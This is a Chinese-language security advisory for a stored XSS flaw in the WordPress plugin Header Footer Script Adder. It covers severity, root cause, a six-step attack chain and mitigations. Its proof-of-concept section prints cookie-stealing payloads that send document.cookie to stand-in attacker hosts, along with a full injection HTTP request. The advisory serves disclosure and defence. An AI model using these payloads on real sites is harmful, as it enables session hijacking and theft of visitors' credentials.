CVE-2025-12109 WordPress Header Footer Script Adder插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12109

漏洞类型

存储型XSS（跨站脚本攻击）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Header Footer Script Adder插件

漏洞概述

CVE-2025-12109是WordPress插件"Header Footer Script Adder"中的一个高危安全漏洞。该插件用于在WordPress网站的页眉、页脚和正文中插入自定义代码。然而，在2.0.5及以下所有版本中，由于插件对用户输入的清理不足和输出转义不完整，导致存在存储型跨站脚本（Stored XSS）漏洞。攻击者可以利用此漏洞在受影响的页面中注入任意JavaScript代码。当其他用户访问被植入恶意脚本的页面时，这些脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全问题。由于该漏洞为存储型XSS，恶意脚本会永久保存在服务器端，影响范围更广。攻击者仅需拥有WordPress的Contributor（贡献者）级别权限即可实施攻击，无需管理员权限，这大大降低了攻击门槛。

技术细节

该漏洞的根本原因在于插件对用户输入的script adder功能缺乏充分的安全过滤。攻击者通过WordPress的帖子编辑功能，在使用该插件的script adder功能时，可以在输入字段中注入恶意JavaScript代码。由于插件仅做了基础的HTML标签过滤，未能对JavaScript事件处理器（如onerror、onload、onclick等）进行有效过滤和转义，导致恶意代码被存储在数据库中。当其他用户访问包含恶意代码的页面时，服务器将未经过正确转义的HTML内容返回给客户端浏览器，浏览器将其解析为可执行脚本。攻击者可利用此漏洞窃取用户Cookie、伪造用户操作、植入钓鱼页面或重定向用户至恶意网站。由于攻击利用的是WordPress的合法功能，传统的WAF规则可能难以检测此类攻击流量。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本和Header Footer Script Adder插件版本，确认版本在2.0.5或以下

STEP 2

权限获取

攻击者获取WordPress Contributor级别账户（通过社会工程学、凭据填充或内部人员协助）

STEP 3

漏洞利用

使用Contributor账户登录WordPress后台，创建或编辑文章，在插件的script adder字段中注入恶意JavaScript代码

STEP 4

持久化

保存并发布文章，恶意脚本被存储在数据库中，成为页面的永久组成部分

STEP 5

触发攻击

当其他用户（受害者）访问包含恶意代码的页面时，浏览器执行注入的JavaScript

STEP 6

数据窃取

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-12109: WordPress Header Footer Script Adder Stored XSS -->
<!-- This PoC demonstrates how an attacker with Contributor-level access can inject malicious JavaScript -->

<!-- Step 1: As a Contributor, edit or create a post/page -->
<!-- Step 2: Use the Header Footer Script Adder plugin's script insertion feature -->
<!-- Step 3: Inject the following payload in any script field (header/body/footer): -->

<script>alert('XSS - CVE-2025-12109');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Or use event handler-based payload: -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">

<!-- Step 4: Save and publish the post -->
<!-- Step 5: When any user visits the page, the malicious script executes -->

<!-- Example HTTP Request to inject payload: -->
POST /wp-admin/post.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: [Contributor cookies]

post_title=Test+Page&content=[hfsa_placeholder]script=<img src=x onerror=fetch('https://evil.com/c='+btoa(document.cookie))>[/hfsa_placeholder]&action=publish

影响范围

Header Footer Script Adder插件 <= 2.0.5

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 立即审查并移除所有可疑的用户账户，特别是具有Contributor权限的账户；2) 临时禁用Header Footer Script Adder插件或限制其使用范围；3) 启用严格的Content Security Policy以阻止内联脚本执行；4) 加强WordPress站点的访问控制，实施双因素认证；5) 使用安全监控工具持续监测异常的POST请求和脚本注入行为；6) 对所有使用该插件的页面进行手动检查，查找并清除已注入的恶意代码。